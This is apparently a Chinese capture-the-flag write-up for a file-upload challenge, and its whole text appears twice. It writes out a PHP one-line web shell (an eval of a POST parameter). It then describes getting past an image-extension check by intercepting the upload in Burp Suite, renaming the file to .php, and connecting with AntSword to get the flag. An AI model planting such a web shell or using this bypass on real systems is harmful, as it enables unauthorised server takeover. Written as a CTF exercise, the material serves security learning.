进入页面后需要上传文件:
准备上传一句话木马aa.php:
<?php @eval($_POST['123']); ?>
上传aa.php时提示文件格式为图片格式,查看代码发现文件后缀是.jpg和.png:
所以准备用burpsuite抓包将上传的一句话木马aa.jpg改为aa.php:
放包,上传成功:
接下来用中国蚁剑连接:
找到flag:
总结:
文件上传
进入页面后需要上传文件:
准备上传一句话木马aa.php:
<?php @eval($_POST['123']); ?>
上传aa.php时提示文件格式为图片格式,查看代码发现文件后缀是.jpg和.png:
所以准备用burpsuite抓包将上传的一句话木马aa.jpg改为aa.php:
放包,上传成功:
接下来用中国蚁剑连接:
找到flag:
总结:
文件上传